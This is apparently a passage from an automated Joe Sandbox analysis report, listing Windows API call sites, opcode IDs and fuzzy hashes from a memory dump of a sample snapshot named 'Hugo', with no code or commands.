                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                              • Opcode ID: ce3d31e51859ada9831f7633a6fe9f1f0d3b634a285499f521102da34b55418b
                                                                                                                                                                                                              • Instruction ID: 1c3a94ce1eab990631b464536da7b2f21cc789becc0ebe43bd725d2525ef83d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce3d31e51859ada9831f7633a6fe9f1f0d3b634a285499f521102da34b55418b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8801DFB2A026197F37212ABA9C8CD7B7E6EDFC3BB1314012BFC05C6244DA608C01B1B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2931989736-0
                                                                                                                                                                                                              • Opcode ID: f355747e0d45a0239ac3072b46b81066b02d431af32b1b1306c97f7ef56574cc
                                                                                                                                                                                                              • Instruction ID: 75492a840e1516f17d3697ee6138753aa8ebd8c13908eabd5e82cea8e1deeeb1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f355747e0d45a0239ac3072b46b81066b02d431af32b1b1306c97f7ef56574cc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9701B5F2A00B057B961456215C42FEB735DAE503B8F048022FD0DDB241EB65ED10F6A3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(0000000A,?,?,00F3F64E,00F3545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F43170
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F431A5
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F431CC
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F431D9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F431E2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                              • Opcode ID: f5c3fcccca25db707ff1f0ea8d23eb169c2dbf9963849408034c293fd5ab8b02
                                                                                                                                                                                                              • Instruction ID: 656296f09949bca55f5b4c4d371e46f2db48f943e57483bc3e4a5b7b72101c1b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5c3fcccca25db707ff1f0ea8d23eb169c2dbf9963849408034c293fd5ab8b02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D01F4B3E416012B961276349C86E2B3E6DAFC13717200436FC2692181EE25CA017121
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?,?,00F70C4E), ref: 00F7091B
                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70936
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70944
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?), ref: 00F70954
                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70960
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3897988419-0
                                                                                                                                                                                                              • Opcode ID: 74727f1f54d56313f23807ae91acbd433b9166b3b18ec2df4c1e21b9e57617c4
                                                                                                                                                                                                              • Instruction ID: d48b3e138c2107062a079d3284d04265969291557d6fbffd1e9db9c11264036f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74727f1f54d56313f23807ae91acbd433b9166b3b18ec2df4c1e21b9e57617c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41018FB2A00208EFEB104F55DC44B9A7BBDEF44761F148125FA0AE2211DB75DD40ABA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00F7F2AE
                                                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 00F7F2BC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00F7F2C4
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00F7F2CE
                                                                                                                                                                                                              • Sleep.KERNEL32 ref: 00F7F30A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2833360925-0
                                                                                                                                                                                                              • Opcode ID: c0807c87eaaae70f1833023811ec1214abafe93566ecb25f70f67316ed77991f
                                                                                                                                                                                                              • Instruction ID: 50d0b516236ff8cde13c9d092fb23dd831fa9417fa59e97aa2a8926c9ce399d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0807c87eaaae70f1833023811ec1214abafe93566ecb25f70f67316ed77991f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F018071C0151DDBDF00AFB4EC49AEDBB79FB09711F004467D506B2251DB309558E7A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71A60
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A6C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A7B
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A82
                                                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F71A99
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 842720411-0
                                                                                                                                                                                                              • Opcode ID: 6f7d9ec46e1f7c87f40e7d68f7413ee527aa854753ad37a8d0bd942b07230541
                                                                                                                                                                                                              • Instruction ID: 42d970a8ef7b659802fb4a019a54f0e81372b429f9b604f7ade512021da6725d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f7d9ec46e1f7c87f40e7d68f7413ee527aa854753ad37a8d0bd942b07230541
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 130181B5A01309BFEB114F68DC48D6A3B7DFF89364B214415F84AC3360DA31DC41AA60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F71976
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F71982
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71991
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71998
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F719AE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                                                              • Opcode ID: 818a35bdc7fa60e1333d3a1bed229a98ad04a8a55c22cd18f1ceff1b62dbb32b
                                                                                                                                                                                                              • Instruction ID: b66c752dfaf2d0b6491b392a6c2e272b2e9c7d177176c6b82cddda139bcb8f3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 818a35bdc7fa60e1333d3a1bed229a98ad04a8a55c22cd18f1ceff1b62dbb32b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F062B5600309ABDB314F68EC59F563B7DFF8A7A0F104415FA4AC7251DA70D8019A60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F71916
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F71922
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F71931
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F71938
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F7194E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                                                              • Opcode ID: a926b7f264fce8f023d49387dcb32ceb88bfe33c310cb53638a27731553232ab
                                                                                                                                                                                                              • Instruction ID: 7f9538db4cf5039892e6e6cabab4270379f25068e9f97d61738fc6f2c7d869c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a926b7f264fce8f023d49387dcb32ceb88bfe33c310cb53638a27731553232ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6F062B5600305ABDB210F69DC4DF563B7DFF8A7A0F104415FA4AD7291DA70DC01AA60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CCB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CD8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CE5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CF2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CFF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80D0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                              • Opcode ID: 4a9544285f8ea9ed41bb06a0ae053ddf66dd80d4539784301688f22c82fec029
                                                                                                                                                                                                              • Instruction ID: 2011802ddce688addba8ccb501999839a48a1b0ae515fff24b84d13fbe259262
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a9544285f8ea9ed41bb06a0ae053ddf66dd80d4539784301688f22c82fec029
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A01A272800B15DFCB30AF66D980856F7F5BF503253158A3ED19752931CBB0A948EF80
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00F765BF
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F765D6
                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00F765EE
                                                                                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 00F7660A
                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00F76624
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3741023627-0
                                                                                                                                                                                                              • Opcode ID: 942707288773f1ca5215e7d2f40f259126d09eb29a71f1645f2975fb18dd7d7a
                                                                                                                                                                                                              • Instruction ID: 9d1551fed310fe442202cdb7c59b9db8c33c0536abcac3434947b4c5b1e999cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 942707288773f1ca5215e7d2f40f259126d09eb29a71f1645f2975fb18dd7d7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95018670900708ABEB245F10DD4EBD67B78FF01715F44465AB187A14E1DBF4AA44AA51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DAD2
                                                                                                                                                                                                                • Part of subcall function 00F42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4), ref: 00F42D4E
                                                                                                                                                                                                                • Part of subcall function 00F42D38: GetLastError.KERNEL32(00FE1DC4,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4,00FE1DC4), ref: 00F42D60
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DAE4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DAF6
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DB08
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DB1A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 3ebdddff3ab3adcb6d404846e1159e4148d0a9f08d2949bb8198f9359d90ea1a
                                                                                                                                                                                                              • Instruction ID: bafd8a804cc70df6adaeedcfa5bf4b471fe66d090059e8507b693b86610a6e2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ebdddff3ab3adcb6d404846e1159e4148d0a9f08d2949bb8198f9359d90ea1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF01232D45608AB8665EB78EDC5D1ABFEEEE447207D50C16F809D7501CB38FC80B654
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4262E
                                                                                                                                                                                                                • Part of subcall function 00F42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4), ref: 00F42D4E
                                                                                                                                                                                                                • Part of subcall function 00F42D38: GetLastError.KERNEL32(00FE1DC4,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4,00FE1DC4), ref: 00F42D60
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F42640
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F42653
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F42664
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F42675
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 2cd5e39bc5cbd488a4081b749ba81ab4d6bdab1d903e7fe57f2d4ee81a1ac79e
                                                                                                                                                                                                              • Instruction ID: fad826224b62e68c49de7a5b9fbe323eb48a709f0d2bd1700d00066349fed521
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cd5e39bc5cbd488a4081b749ba81ab4d6bdab1d903e7fe57f2d4ee81a1ac79e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F0FE70C421A89B9B82AF65FCC18497F79FB24761385093BF814DA275D7360901BFC4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __freea$_free
                                                                                                                                                                                                              • String ID: a/p$am/pm
                                                                                                                                                                                                              • API String ID: 3432400110-3206640213
                                                                                                                                                                                                              • Opcode ID: 168482ab8f6f9cb260460c7fe1106c807883da114ea9dbc2092f150539a16cd1
                                                                                                                                                                                                              • Instruction ID: e7d3aa13bbf7cd3748011f303e78232a2bb964808214f2e8d231007ef616e6fb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 168482ab8f6f9cb260460c7fe1106c807883da114ea9dbc2092f150539a16cd1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CD10276E10206DACB249F68C8557FABFB1FF06320F29415AED029B250D3359DC0EBA0
                                                                                                                                                                                                              APIs
